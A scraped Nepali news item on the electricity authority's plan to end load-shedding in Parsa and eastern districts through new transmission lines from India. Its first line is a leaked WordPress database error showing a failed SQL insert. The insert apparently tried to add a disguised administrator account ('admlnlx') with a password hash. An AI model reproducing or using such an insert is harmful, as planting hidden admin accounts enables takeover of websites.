WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BodyBF1abT5jlJQ1eJms.WpdEAWs7j1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 17:58:48', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २८-
नेपाल विद्युत प्राधिकरणले पर्साको वीरगञ्जसहित पूर्वी नेपालका जिल्लाहरुमा लोडसेडिङ हटाउन तयारी थालेको छ । प्राधिकरणका अनुसार अब लोडसेडिङ हटाउन पर्सासहित पूर्वका झापा, मोरङ, सुनसरीलगायतका जिल्लालाई प्राथमिकतामा राखिएको छ ।
काठमाडौंसहित ८ जिल्लाबाट लोडसेडिङ हटाउने अभियानको सुरुवात गरेको प्राधिकरणले पोखरा र चितवनलाई पनि लोडसेडिङमुक्त गराइसकेको छ । अबको १५ दिनभित्रै रक्सौल परवानीपुर १३२ केभीको प्रशारणलाइन निर्माणको काम सकिँदैछ । सबस्टेशनको केही काम सकिएपछि भारतबाट थप ५० मेगावाट बिजुली आउने छ ।
त्यस्तै कुशाह कटैया प्रशारणलाइनको काम पनि छिट्टै सकेर अर्को ५० मेगावाट बिजुली भारतबाट राष्ट्रिय प्रशारण लाइनमा जोडिने छ । यो प्रशारणलाइनको सब स्टेशनको काम थोरैमात्रै बाकी छ ।रक्सौल–परवानीपुर र कुशाह–कटैया प्रसारण लाइनको काम सकिनासाथ भारतबाट थप एक सय मेगावाट बिजुली आयात हुनेछ र पूर्वी नेपालका जिल्लाहरु लोडसेडिङ मुक्त हुनेछन् ।
अनलाइन खवरको सहयोगमा